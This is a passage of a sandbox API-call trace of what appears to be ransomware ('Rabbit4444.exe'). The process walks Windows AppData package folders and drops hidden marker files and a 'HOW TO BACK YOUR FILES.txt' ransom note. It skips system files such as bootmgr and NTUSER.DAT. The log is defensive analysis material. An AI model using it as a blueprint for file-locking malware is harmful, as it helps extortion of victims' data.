lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCache" [0064.242] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCache\\" [0064.242] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" [0064.242] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\ac\\inetcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.245] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.248] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.248] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.249] CloseHandle (hObject=0x2cc) returned 1 [0064.249] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCache") returned 89 [0064.249] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.249] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x19ce8eec, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd179cdce, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9e72ab, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0064.249] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.249] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.249] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.249] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.249] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x19ce8eec, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd179cdce, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef9e72ab, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.249] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.249] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.249] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.249] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.249] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.249] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef9e72ab, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef9e72ab, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef9e72ab, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.250] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.250] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.250] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef9e72ab, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef9e72ab, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef9e72ab, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.250] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0064.250] lstrcpyW (in: lpString1=0x130ebec, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.250] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\ac\\inetcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.251] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.251] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.251] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.251] CloseHandle (hObject=0x2a0) returned 1 [0064.251] CloseHandle (hObject=0x2cc) returned 1 [0064.251] GetCurrentThreadId () returned 0xd98 [0064.251] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122168 [0064.251] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe" [0064.251] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1185a8 | out: hHeap=0xe0000) returned 1 [0064.251] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122160 | out: hHeap=0xe0000) returned 1 [0064.251] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe" [0064.252] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\" [0064.252] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3" [0064.252] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.259] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.261] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.262] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.262] CloseHandle (hObject=0x2cc) returned 1 [0064.263] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe") returned 80 [0064.263] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.263] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4d85f5, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xc2086555, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xef9e72ab, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0064.263] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.263] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.263] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.263] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.263] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4d85f5, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xc2086555, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xef9e72ab, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.263] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.263] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.263] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.263] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.263] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.263] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef9e72ab, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef9e72ab, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefa0d2d5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.263] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.263] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.263] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1c62fb4a, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x38070899, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x38070899, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AC", cAlternateFileName="")) returned 1 [0064.263] lstrcmpiW (lpString1="AC", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.263] lstrcmpiW (lpString1="AC", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.263] lstrcmpiW (lpString1="AC", lpString2="Rabbit4444.exe") returned -1 [0064.263] lstrcmpiW (lpString1="AC", lpString2=".") returned 1 [0064.263] lstrcmpiW (lpString1="AC", lpString2="..") returned 1 [0064.263] lstrcmpiW (lpString1="AC", lpString2="windows") returned -1 [0064.263] lstrcmpiW (lpString1="AC", lpString2="bootmgr") returned -1 [0064.263] lstrcmpiW (lpString1="AC", lpString2="pagefile.sys") returned -1 [0064.263] lstrcmpiW (lpString1="AC", lpString2="boot") returned -1 [0064.264] lstrcmpiW (lpString1="AC", lpString2="ids.txt") returned -1 [0064.264] lstrcmpiW (lpString1="AC", lpString2="NTUSER.DAT") returned -1 [0064.264] lstrcpyW (in: lpString1=0x130ebda, lpString2="AC" | out: lpString1="AC") returned="AC" [0064.264] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122120 [0064.264] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa8) returned 0x118028 [0064.264] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122128 | out: ListHead=0xf68b0, ListEntry=0x122128) returned 0x11d028 [0064.264] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c5e36c8, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd16e9b9b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1c5e36c8, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0064.264] lstrcmpiW (lpString1="AppData", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.264] lstrcmpiW (lpString1="AppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.264] lstrcmpiW (lpString1="AppData", lpString2="Rabbit4444.exe") returned -1 [0064.264] lstrcmpiW (lpString1="AppData", lpString2=".") returned 1 [0064.264] lstrcmpiW (lpString1="AppData", lpString2="..") returned 1 [0064.264] lstrcmpiW (lpString1="AppData", lpString2="windows") returned -1 [0064.264] lstrcmpiW (lpString1="AppData", lpString2="bootmgr") returned -1 [0064.264] lstrcmpiW (lpString1="AppData", lpString2="pagefile.sys") returned -1 [0064.264] lstrcmpiW (lpString1="AppData", lpString2="boot") returned -1 [0064.264] lstrcmpiW (lpString1="AppData", lpString2="ids.txt") returned -1 [0064.264] lstrcmpiW (lpString1="AppData", lpString2="NTUSER.DAT") returned -1 [0064.264] lstrcpyW (in: lpString1=0x130ebda, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0064.264] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122200 [0064.264] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb2) returned 0x123200 [0064.264] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122208 | out: ListHead=0xf68b0, ListEntry=0x122208) returned 0x122128 [0064.264] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c54ad1b, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd16e9f95, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1c54ad1b, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0064.264] lstrcmpiW (lpString1="LocalCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.264] lstrcmpiW (lpString1="LocalCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.264] lstrcmpiW (lpString1="LocalCache", lpString2="Rabbit4444.exe") returned -1 [0064.264] lstrcmpiW (lpString1="LocalCache", lpString2=".") returned 1 [0064.264] lstrcmpiW (lpString1="LocalCache", lpString2="..") returned 1 [0064.264] lstrcmpiW (lpString1="LocalCache", lpString2="windows") returned -1 [0064.264] lstrcmpiW (lpString1="LocalCache", lpString2="bootmgr") returned 1 [0064.264] lstrcmpiW (lpString1="LocalCache", lpString2="pagefile.sys") returned -1 [0064.264] lstrcmpiW (lpString1="LocalCache", lpString2="boot") returned 1 [0064.264] lstrcmpiW (lpString1="LocalCache", lpString2="ids.txt") returned 1 [0064.264] lstrcmpiW (lpString1="LocalCache", lpString2="NTUSER.DAT") returned -1 [0064.265] lstrcpyW (in: lpString1=0x130ebda, lpString2="LocalCache" | out: lpString1="LocalCache") returned="LocalCache" [0064.265] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121fa0 [0064.265] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb8) returned 0x1232c0 [0064.265] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121fa8 | out: ListHead=0xf68b0, ListEntry=0x121fa8) returned 0x122208 [0064.265] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c524bdd, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd16ea38a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1c524bdd, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0064.265] lstrcmpiW (lpString1="LocalState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.265] lstrcmpiW (lpString1="LocalState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.265] lstrcmpiW (lpString1="LocalState", lpString2="Rabbit4444.exe") returned -1 [0064.265] lstrcmpiW (lpString1="LocalState", lpString2=".") returned 1 [0064.265] lstrcmpiW (lpString1="LocalState", lpString2="..") returned 1 [0064.265] lstrcmpiW (lpString1="LocalState", lpString2="windows") returned -1 [0064.265] lstrcmpiW (lpString1="LocalState", lpString2="bootmgr") returned 1 [0064.265] lstrcmpiW (lpString1="LocalState", lpString2="pagefile.sys") returned -1 [0064.265] lstrcmpiW (lpString1="LocalState", lpString2="boot") returned 1 [0064.265] lstrcmpiW (lpString1="LocalState", lpString2="ids.txt") returned 1 [0064.265] lstrcmpiW (lpString1="LocalState", lpString2="NTUSER.DAT") returned -1 [0064.265] lstrcpyW (in: lpString1=0x130ebda, lpString2="LocalState" | out: lpString1="LocalState") returned="LocalState" [0064.265] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122300 [0064.265] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb8) returned 0x123500 [0064.265] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122308 | out: ListHead=0xf68b0, ListEntry=0x122308) returned 0x121fa8 [0064.265] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c524bdd, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd16ea774, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1c524bdd, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0064.265] lstrcmpiW (lpString1="RoamingState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.265] lstrcmpiW (lpString1="RoamingState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.265] lstrcmpiW (lpString1="RoamingState", lpString2="Rabbit4444.exe") returned 1 [0064.265] lstrcmpiW (lpString1="RoamingState", lpString2=".") returned 1 [0064.265] lstrcmpiW (lpString1="RoamingState", lpString2="..") returned 1 [0064.265] lstrcmpiW (lpString1="RoamingState", lpString2="windows") returned -1 [0064.265] lstrcmpiW (lpString1="RoamingState", lpString2="bootmgr") returned 1 [0064.265] lstrcmpiW (lpString1="RoamingState", lpString2="pagefile.sys") returned 1 [0064.265] lstrcmpiW (lpString1="RoamingState", lpString2="boot") returned 1 [0064.265] lstrcmpiW (lpString1="RoamingState", lpString2="ids.txt") returned 1 [0064.265] lstrcmpiW (lpString1="RoamingState", lpString2="NTUSER.DAT") returned 1 [0064.265] lstrcpyW (in: lpString1=0x130ebda, lpString2="RoamingState" | out: lpString1="RoamingState") returned="RoamingState" [0064.265] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122180 [0064.265] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xbc) returned 0xefb28 [0064.266] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122188 | out: ListHead=0xf68b0, ListEntry=0x122188) returned 0x122308 [0064.266] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c54ad1b, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x71318bbc, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x71318bbc, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings", cAlternateFileName="")) returned 1 [0064.266] lstrcmpiW (lpString1="Settings", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.266] lstrcmpiW (lpString1="Settings", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.266] lstrcmpiW (lpString1="Settings", lpString2="Rabbit4444.exe") returned 1 [0064.266] lstrcmpiW (lpString1="Settings", lpString2=".") returned 1 [0064.266] lstrcmpiW (lpString1="Settings", lpString2="..") returned 1 [0064.266] lstrcmpiW (lpString1="Settings", lpString2="windows") returned -1 [0064.266] lstrcmpiW (lpString1="Settings", lpString2="bootmgr") returned 1 [0064.266] lstrcmpiW (lpString1="Settings", lpString2="pagefile.sys") returned 1 [0064.266] lstrcmpiW (lpString1="Settings", lpString2="boot") returned 1 [0064.266] lstrcmpiW (lpString1="Settings", lpString2="ids.txt") returned 1 [0064.266] lstrcmpiW (lpString1="Settings", lpString2="NTUSER.DAT") returned 1 [0064.266] lstrcpyW (in: lpString1=0x130ebda, lpString2="Settings" | out: lpString1="Settings") returned="Settings" [0064.266] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122240 [0064.266] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb4) returned 0x122a80 [0064.266] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122248 | out: ListHead=0xf68b0, ListEntry=0x122248) returned 0x122188 [0064.266] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc1d6ba1f, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xc1d6ba1f, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xc1d6ba1f, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0064.266] lstrcmpiW (lpString1="SystemAppData", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.266] lstrcmpiW (lpString1="SystemAppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.266] lstrcmpiW (lpString1="SystemAppData", lpString2="Rabbit4444.exe") returned 1 [0064.266] lstrcmpiW (lpString1="SystemAppData", lpString2=".") returned 1 [0064.266] lstrcmpiW (lpString1="SystemAppData", lpString2="..") returned 1 [0064.266] lstrcmpiW (lpString1="SystemAppData", lpString2="windows") returned -1 [0064.266] lstrcmpiW (lpString1="SystemAppData", lpString2="bootmgr") returned 1 [0064.266] lstrcmpiW (lpString1="SystemAppData", lpString2="pagefile.sys") returned 1 [0064.266] lstrcmpiW (lpString1="SystemAppData", lpString2="boot") returned 1 [0064.266] lstrcmpiW (lpString1="SystemAppData", lpString2="ids.txt") returned 1 [0064.266] lstrcmpiW (lpString1="SystemAppData", lpString2="NTUSER.DAT") returned 1 [0064.266] lstrcpyW (in: lpString1=0x130ebda, lpString2="SystemAppData" | out: lpString1="SystemAppData") returned="SystemAppData" [0064.266] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121fe0 [0064.266] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xbe) returned 0x123760 [0064.266] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121fe8 | out: ListHead=0xf68b0, ListEntry=0x121fe8) returned 0x122248 [0064.266] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c524bdd, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd179aaef, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1c524bdd, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, 